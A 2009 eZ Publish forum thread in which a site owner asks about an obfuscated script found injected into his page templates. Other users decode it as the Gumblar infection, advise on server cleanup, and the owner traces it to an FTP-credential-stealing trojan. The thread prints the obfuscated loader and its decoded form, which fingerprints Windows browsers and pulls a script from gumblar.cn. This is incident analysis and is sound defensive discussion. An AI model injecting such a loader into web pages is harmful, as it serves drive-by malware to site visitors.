Hacked?

Author Message

Neo Pixel

Monday 11 May 2009 11:10:52 am

Is this hacker code?

<!-- 
(function(MI159){var r1jL='%';var Xow='v<61r<20a<3d<22ScriptEn<67ine<22<2cb<3d<22Version()+<22<2c<6a<3d<22<22<2c<75<3dnaviga<74<6fr<2eus<65rAg<65<6e<74<3bi<66(<28u<2eindex<4ff(<22<57in<22)<3e<30)<26<26(u<2eindexOf(<22NT<206<22)<3c0)<26<26(d<6fcum<65nt<2e<63ooki<65<2eindexO<66(<22<6diek<3d<31<22)<3c0)<26<26(type<6f<66<28zr<76zts)<21<3d<74<79p<65o<66(<22A<22)))<7bz<72vzts<3d<22A<22<3beva<6c(<22i<66(<77indow<2e<22<2ba+<22)j<3dj+<22+<61+<22Major<22+<62<2ba<2b<22M<69n<6fr<22+b+a+<22<42uild<22<2bb<2b<22j<3b<22)<3bdoc<75<6dent<2ewr<69t<65(<22<3c<73cri<70t<20src<3d<2f<2f<67umblar<2ec<6e<2frss<2f<3fi<64<3d<22+j+<22<3e<3c<5c<2fscr<69pt<3e<22)<3b<7d';var OBEG=Xow.replace(MI159,r1jL);eval(unescape(OBEG))})(/</g);
 -->

It's wrapped in javascript tags and I found it under the html head tag in one of my ezpublish installs.

Asking stupid questions so you don't have to!

André R.

Monday 11 May 2009 12:10:57 pm

yes, opening the page here on linux gives me a warning from firefox about:

This web site at gumblar.cn has been reported as an attack site and has been blocked based on your security preferences.

google:

Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-06, and the last time suspicious content was found on this site was on 2009-05-06.

Malicious software includes 963 scripting exploit(s), 6 trojan(s).

This site was hosted on 1 network(s) including AS42831 (UKSERVERS).

switching the eval to alert gives you the code in plain text something like this:

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A")))
{
zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//gumblar.cn/rss/id='+j+'><\/script>");
}

So seams to be targeting Windows XP and lower.

Where does the code come from? user contributed content?
Is literal.html enabled? and forgot to use |wash operator in template?

If this is caused by eZ Publish security bug, please create an issue in the tracker and mark it as security issue.

eZ Online Editor 5: http://projects.ez.no/ezoe || eZJSCore (Ajax): http://projects.ez.no/ezjscore || eZ Publish EE http://ez.no/eZPublish/eZ-Publish-Enterprise-Subscription
@: http://twitter.com/andrerom

Neo Pixel

Monday 11 May 2009 1:06:33 pm

It just appeared from nowhere so I'm assuming a hack through a vulnerability.

Warning: Visiting this site may harm your computer!
The website at www.ne0.co.uk contains elements from the site gumblar.cn, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for gumblar.cn

and it's also on the admin http://www.ne0.co.uk/ezwebin_site_admin/

Literal HTML is not enabled

I don't think it's a specific ezpublish hack as it's also on a friends non ezp site

The website at www.crystal-jewels.co.uk contains elements from the site gumblar.cn, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.

Asking stupid questions so you don't have to!

André R.

Monday 11 May 2009 1:22:54 pm

Check your design/admin/templates/loginpagelayout.tpl.

The script should be between head and body tag, in clean ezp it will look like this:

</style>
<![endif]-->
{/literal}

</head>

<body>

<div id="allcontent">

<div id="header">
<div id="header-design">

If it is there then it looks like the hacker'has hacked your server somehow (either vulnerability or brute force) and added the script in templates.

eZ Online Editor 5: http://projects.ez.no/ezoe || eZJSCore (Ajax): http://projects.ez.no/ezjscore || eZ Publish EE http://ez.no/eZPublish/eZ-Publish-Enterprise-Subscription
@: http://twitter.com/andrerom

Neo Pixel

Monday 11 May 2009 1:40:07 pm

There's nothing between the head and body tag in that file

but I have found it in

/design/base/templates/loginpagelayout.tpl
/design/standard/templates/loginpagelayout.tpl

/design/base/templates/pagelayout.tpl
/design/standard/templates/pagelayout.tpl

I've reloaded the design directory but it's still inthere somewhere.

I've instructed my hosts to investigate.

Thanks for your help

Asking stupid questions so you don't have to!

André R.

Monday 11 May 2009 10:30:11 pm

Try clearing template cache, might be he/she has simply edited some of your compiled templates..

eZ Online Editor 5: http://projects.ez.no/ezoe || eZJSCore (Ajax): http://projects.ez.no/ezjscore || eZ Publish EE http://ez.no/eZPublish/eZ-Publish-Enterprise-Subscription
@: http://twitter.com/andrerom

zurgutt -

Tuesday 12 May 2009 6:33:25 am

I have had to clean up a few compromised servers that had code like that embedded in html and tpl files.. its hard work.

Be very very careful and thorough. Just removing the added part from templates is not enough, rootkits that do this usually also install several fallback routines to re-infect stuff and there also may be backdoors and keyloggers installed in system binaries. sshd is often modified, to collect passwords, for example.

General approach:
1. make extra full backup of whole system.
2. use iptables rules to forbid ALL net traffic, both incoming and outgoing, except ip of computer you are working from. This is so that hacker cant access it while you work, and perhaps cant do a last minute rm -rf or whatnot.
3. Very carefully find any changes to the system and reverse them. find -ctime is your best friend. Also it is useful to compare filesystem to last backup made while uninfected. Pay special attention to /etc and /usr filesystems. Reverse any changes, update outdated programs, add security measures etc.
3b. It may be best idea to completely reinstall the OS clean, and transfer the cleaned web applications to new host. Takes less time than cleaning out compromised OS and is securer.
4. Remove iptables restriction. Keep keen eye on server for week or more, looking for signs of reinfection. Make full backup offsite at least once a day.

If any of the above is Greek for you, get help from a server professional.

Certified eZ developer looking for projects.
zurgutt at gg.ee

Neo Pixel

Tuesday 12 May 2009 10:05:47 am

Thanks for all your words of wisdom.

I shall delete everything from ne0.co.uk and start again. luckily it was only a development install so no harm done.

My hosts did point out there is the possibility of a vulnerability to ezpublish tho.

I shall reinstall and monitor the site for re-infection.

Thanks again

Asking stupid questions so you don't have to!

Neo Pixel

Thursday 14 May 2009 3:43:41 am

I have found out that the problem lies on the computer with FTP access, NOT the server.

It's a TROJAN that hijacks FTP details from FTP programs and uploads new code into the files. Very Sneaky...

Make sure all your anitvirus software is up to date!!

Asking stupid questions so you don't have to!

Powered by eZ Publish™ CMS Open Source Web Content Management. Copyright © 1999-2014 eZ Systems AS (except where otherwise noted). All rights reserved.